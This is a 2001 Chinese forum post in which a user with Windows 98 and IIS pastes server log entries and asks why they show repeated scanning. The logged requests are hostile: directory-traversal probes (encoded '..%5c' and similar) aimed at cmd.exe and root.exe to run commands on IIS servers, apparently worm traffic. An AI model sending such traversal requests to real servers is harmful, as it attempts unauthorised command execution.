★★重大发现★★
请关注【安全技术】里下面的帖子!
http://www.csdn.net/expert/topic/340/340295.shtm我的机器是WIN98系统+IIS
检查日志发现下面居然有规律的黑客扫描记录?
以下IP并不是我本地IP,难道是我的机器在自动扫描别人的IP?
我并没有使用任何工具!奇怪!请知情者给予解答和解决方法!
谢谢!重大发现
61.11.73.45 - - [19/Sep/2001:00:03:01 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 500 0
61.11.73.45 - - [19/Sep/2001:00:03:03 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 500 0
61.11.73.45 - - [19/Sep/2001:00:03:08 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 522
61.11.73.45 - - [19/Sep/2001:00:03:13 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 522
61.11.73.45 - - [19/Sep/2001:00:03:16 +0800] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:09 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:09 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:09 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 522
61.134.35.39 - - [19/Sep/2001:00:05:09 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 522
61.134.35.39 - - [19/Sep/2001:00:05:10 +0800] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:10 +0800] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:10 +0800] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 522
61.134.35.39 - - [19/Sep/2001:00:05:10 +0800] "GET /msadc/..%5c../..%5c../..%5c/..?../..?../..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:11 +0800] "GET /scripts/..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:11 +0800] "GET /scripts/..?../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:11 +0800] "GET /scripts/../../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:11 +0800] "GET /scripts/..\../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:12 +0800] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:12 +0800] "GET /scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:12 +0800] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
61.134.35.39 - - [19/Sep/2001:00:05:12 +0800] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 0
.......
这样的记录几乎我上网就有,而且IP不同!
后台究竟在运行什么?